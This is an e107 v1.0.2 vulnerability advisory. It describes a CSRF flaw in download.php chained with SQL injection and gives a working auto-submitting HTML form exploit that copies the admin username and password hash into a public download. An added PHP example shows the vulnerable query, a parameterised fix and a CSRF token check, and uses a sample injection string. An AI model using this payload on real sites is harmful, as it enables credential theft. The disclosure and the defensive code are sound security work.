Cross-Site Request Forgery vulnerability in the e107_admin/download.php page, which is also vulnerable to SQL injection in the POST form. The e-token or ac tokens are not used in this page, which results in the CSRF vulnerability. This in itself is not a major security vulnerability, but when done in conjunction with a SQL injection attack it can result in complete information disclosure. The parameters which are vulnerable to SQL injection on this page include: download_url, download_url_extended, download_author_email, download_author_website, download_image, download_thumb, download_visible, download_class.

The following is an exploit containing javascript code that submits a POST request on behalf of the administrator once the page is visited. It contains a SQL injection that causes the username and password (in MD5) of the administrator to be added to the Author Name of a publicly available download.
------------------------------------------------------------------------------------------
Exploit:
<html>
<body onload="document.formCSRF.submit();">
<form method="POST" name="formCSRF" action="http://[site]/e107/e107102/e107_admin/download.php?create">
<input type="hidden" name="cat_id" value="1"/>
<input type="hidden" name="download_category" value="2"/>
<input type="hidden" name="download_name" value="adminpassdownload"/>
<input type="hidden" name="download_url" value="test.txt', (select concat(user_loginname,'::',user_password) from e107_user where user_id = '1'), '', '', '', '', '0', '2', '2', '1352526286', '', '', '2', '0', '', '0', '0' ) -- -"/>
<input type="hidden" name="download_url_external" value=""/>
<input type="hidden" name="download_filesize_external" value=""/>
<input type="hidden" name="download_filesize_unit" value="KB"/>
<input type="hidden" name="download_author" value=""/>
<input type="hidden" name="download_author_email" value=""/>
<input type="hidden" name="download_author_website" value=""/>
<input type="hidden" name="download_description" value=""/>
<input type="hidden" name="download_image" value=""/>
<input type="hidden" name="download_thumb" value=""/>
<input type="hidden" name="download_datestamp" value=""/>
<input type="hidden" name="download_active" value="1"/>
<input type="hidden" name="download_datestamp" value="10%2F11%2f2012+02%3A47%3A47%3A28"/>
<input type="hidden" name="download_comment" value="1"/>
<input type="hidden" name="download_visible" value="0"/>
<input type="hidden" name="download_class" value="0"/>
<input type="hidden" name="submit_download" value="Submit+Download"/>
</form>
</body>
</html>
------------------------------------------------------------------------------------------
Fix:
This bug has been fixed in the following revision: r13058
------------------------------------------------------------------------------------------
Shout outs: Red Hat Security Team, Ms. Umer, Dr. Wu, Tim Williams, friends, & family.

Contact:
Mail: infosec4breakfast@gmail.com
Blog: infosec4breakfast.com
Twitter: @jershmagersh
Youtube: youtube.com/user/infosec4breakfast

Source: e107 v1.0.2 CSRF Resulting in SQL Injection
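The MyBB advisory (item 24) and the e107 advisory (item 25) above share one root cause, a POST parameter interpolated straight into an SQL string, and the e107 page additionally lacks a request token. The following is an added example written for this digest, not code from MyBB or e107: it places that unsafe pattern next to a parameterised query and a CSRF token check. It assumes PHP with the PDO SQLite driver, a constructed `attachments` table standing in for the forum's real schema, and the field name `e-token` taken from the e107 advisory.

```php
<?php
// Added example, not MyBB's or e107's code: the unsafe pattern named in both
// advisories (a request parameter interpolated into SQL) next to its fixes.
// Assumptions: PDO with an in-memory SQLite table (constructed sample data), and
// the token field name 'e-token' as named in the e107 advisory.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE attachments (aid INTEGER PRIMARY KEY, posthash TEXT, pid INTEGER)");
$pdo->exec("INSERT INTO attachments (posthash, pid) VALUES ('abc123', 7), ('zzz999', 8)");

// Vulnerable: mirrors editpost.php line 398, posthash='{$posthash}' OR ...
// A single quote inside $posthash closes the literal; whatever follows is
// parsed as SQL, so the caller no longer controls the shape of the WHERE clause.
function find_attachments_vulnerable(PDO $pdo, string $posthash, int $pid): array
{
    $sql = "SELECT aid FROM attachments WHERE posthash='{$posthash}' OR pid='{$pid}'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: bound parameters travel separately from the query text, so the same
// input is compared as data and cannot alter the statement. This is the fix for
// every parameter the e107 advisory lists (download_url, download_image, ...).
function find_attachments_safe(PDO $pdo, string $posthash, int $pid): array
{
    $stmt = $pdo->prepare("SELECT aid FROM attachments WHERE posthash = :hash OR pid = :pid");
    $stmt->execute([':hash' => $posthash, ':pid' => $pid]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// CSRF defence the e107 advisory says download.php does not apply: a random
// per-session token is embedded in the admin form and verified on submit.
// A form auto-submitted from another site cannot read the victim's token, so
// the request is rejected before any database work happens.
function issue_csrf_token(array &$session): string
{
    $session['csrf_token'] = bin2hex(random_bytes(32));
    return $session['csrf_token'];
}

function csrf_token_valid(array $session, array $post): bool
{
    // hash_equals() compares in constant time, so the check leaks no timing info
    return isset($session['csrf_token'], $post['e-token'])
        && hash_equals($session['csrf_token'], (string) $post['e-token']);
}

// Demonstration with a constructed hostile value in the posthash field.
$hostile = "x' OR '1'='1";
// The interpolated query is widened by the injected OR and matches unrelated rows.
printf("vulnerable: %s\n", implode(',', find_attachments_vulnerable($pdo, $hostile, 7)));
// The bound query treats the same text as an ordinary posthash value.
printf("safe:       %s\n", implode(',', find_attachments_safe($pdo, $hostile, 7)));

$session = [];
$token = issue_csrf_token($session);
var_dump(csrf_token_valid($session, ['e-token' => $token]));        // request from the site's own form
var_dump(csrf_token_valid($session, ['download_name' => 'x']));    // cross-site form carrying no token
```

Run it with the command-line interpreter (`php example.php`); the first printed line lists every row, the second only the attachment for pid 7, and the two `var_dump` calls print `true` and `false`.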
